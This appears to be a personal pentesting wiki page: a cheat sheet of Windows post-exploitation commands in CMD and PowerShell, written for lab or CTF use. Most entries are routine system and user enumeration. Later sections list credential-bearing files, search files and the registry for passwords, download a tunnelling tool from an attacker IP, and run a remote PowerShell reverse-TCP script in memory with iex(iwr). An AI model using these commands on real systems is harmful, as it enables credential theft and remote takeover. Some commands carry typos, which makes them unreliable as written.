Commands

  • To understand Powershell working and commands formation do checkout

pagePowershell

  • Commands used in post exploitation for CMD and Powershell variants

C: command for cmd
P: command for powershell

  • System information

C: systeminfo
P: Get-ComputerInfo

  • Grep

C: findstr
P: Select-String -Pattern "OS:"

  • Piping

|
C: systeminfo | findstr "OS"
P: cat test.txt | Select-String -Pattern "OS"

  • User name

C: whoami [or] echo %username%
P: $env:UserName

  • Machine name

C: hostname
P: $env:DomainName [or] $env:Computername

  • Users

C: net user [or] net user /domain
P: Get-LocalUser

  • Information about the user

C: net user dnoscp
P: Get-LocalUser dnoscp

  • Groups

C: net localgroup [or] net localgroup /domain
P: Get-LocalGroup

  • Get Group members

C: net localgroup Administrators
P: Get-LocalGroupMember Administrators

  • Get the network adapters

C: ipconfig [or] ipconfig /all
P: Get-NetAdapter

  • Routing Table information

C: route print
P: Get-NetRoute

  • Open ports

C: netstat -ano -p TCP [or] netstat -ano -p UDP
P: Get-NetTCPConnection

  • Scheduled Jobs

C: schtasks
P: Get-ScheduledTask

  • Running Process

C: tasklist /svc
P: Get-Process

  • Starting a service

C: net start Themes
P: Start-Process -FilePath "sort.exe"

  • Installed Drivers

C: drivequery
P: Get-WindowsDriver -Online -All

  • Last upated information

C: wmic   qfe get Caption, Description, InstalledOn, HotFixID  
P: (New-Object -com "Microsoft.Update.AutoUpdate"). Results | fl

  • Juicy files location

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

  • Find files

C: dir /s /p /*.txt /*.xml
P: Get-ChildIten -Path . -Include *.txt,*xml -Recurse -File -Force -ErrorAction 'SilentlyContinue'

  • Search for a string in a file

C: findstr /si "password" *.txt,*.xml
P: Get-ChildItem -Recurse . -Filter *.txt,*.xml | Select-String "password"

  • Serch registry for passwords

reg query HKLM /f "password" /t REG_SZ /s  
reg query HKCU /f "password" /t REG_SZ /s

  • Running Services

C: sc query
P: Get-Service [or] Get-Service | ? {$_.Status -eq "Running"}

  • Information about the running processes

C: sc query "Spooler"
P: Get-Service "Spooler"

  • Copy a file

C: copy source_location destination
P: Copy-Item source_location -Destination destination

  • Move a file

C: move source_location destination
P: Move-Item source_location -Destination destination

  • Download a file

C: certutil -f -split -urlcache http://10.10.10.10/chisel.exe -outfile chisel.exe
P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe
P: (New-Object System.Net.Web.Client).DownloadFile("http://10.10.10.10/chisel.exe". "chisel.exe")

  • Exeucte powershell scripts directly from the memory

P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing)

# Can be aliased as
iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)
PreviousPowershellNextHackthebox

Last updated